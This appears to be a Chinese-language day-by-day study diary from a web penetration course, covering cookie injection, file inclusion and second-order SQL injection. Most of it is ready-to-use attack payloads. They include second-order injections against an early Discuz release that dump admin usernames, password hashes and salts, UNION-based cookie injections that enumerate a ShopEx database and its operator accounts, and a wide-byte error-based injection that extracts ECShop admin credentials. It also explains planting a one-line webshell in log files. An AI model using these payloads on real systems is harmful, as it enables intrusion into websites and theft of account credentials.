---------------------------------------------------------
第一天 cookies注入
1,web体系结构
表示层,逻辑层(动态),存储层(数据库)
表示层,逻辑层,应用层(waf),存储层
2,利用Cookies Manager火狐插件修改cookie进行注入
---------------------------------------------------------
第二天 文件包含漏洞、POST二次注入
文件包含漏洞:检查本站是否存在日志、错误记录页面,若存在,则故意在各个参数中插入一句话木马使其报错并记录进入日志,然后用菜刀连接该日志、错误记录页面。
---------------------------------------------------------
第三天 实战二次注入(MySQL)
实战为Discuz早期版本漏洞
POST二次注入:当第一次的留言等输入内容会被过滤、检测时,输入的内容不会被当成SQL注入来运行,就是输入的字符串,在查看url中的参数、确定是否有重新编辑的页面以及其参数,存在这样的漏洞的网站,会默认对二次编辑的内容不检测,默认数据库中的数据都是安全的,当编辑时没有做任何过滤直接保存到数据库,从而达到注入效果。因此可以利用这个逻辑漏洞对其进行注入,找到重新编辑,输入内容并抓包,构造一个sql注入语句,提交后可在内容显示区看到返回的结果。
1,可回复
',`subject`=(/*!select*/ concat(@@version,':',user(),':',database())),comment='
查询数据库信息
回复
',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment='
查询帐号密码,回复后点击编辑可以在地址栏看到自己的pid和tid,记录下来。
2,然后访问追加模式编辑的链接,并且将1中得到的pid和tid填入
/forum.php?mod=misc&tid={tid}&action=postappend&pid={pid}
点击提交就实现了二次注入
---------------------------------------------------------
第三天 实战cookies注入(MySQL)
实战为某商城CMS早期漏洞
1,MySQL数据库中所有的数据库名都存在 information_schema数据库中的schemata表中的schema_name中
" and 1=2 union select 1,2,schema_name,4,5,6 from information_schema.schemata limit 1,1#
2,一个数据库中的表名都存放在information_schema数据库中的tables表中的table_name中
" and 1=2 union select 1,2,table_name,4,5,6 from information_schema.tables where table_schema=0x73686F706578 limit 0,1#
3,一个数据库中的字段名都存放在information_schema数据库中的columns表中的columns_name中
" and 1=2 union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_schema=0x73686F706578 and table_name=0x7364625F6F70657261746F7273 limit 1,1 #
4,查询记录可根据1,2,3得到的信息,直接查询相应的记录
" and 1=2 union select 1,2,username,4,5,6 from shopex.sdb_operator limit 0,1#
简洁版 " LIMIT 1,1 UNION ALL SELECT 11,22,(select count(*) from sdb_operators),44,55,66#
---------------------------------------------------------
宽字节 %ce %df
%ce' and 1=1 union select 1 and (select 1 from(select count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) FROM ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) %23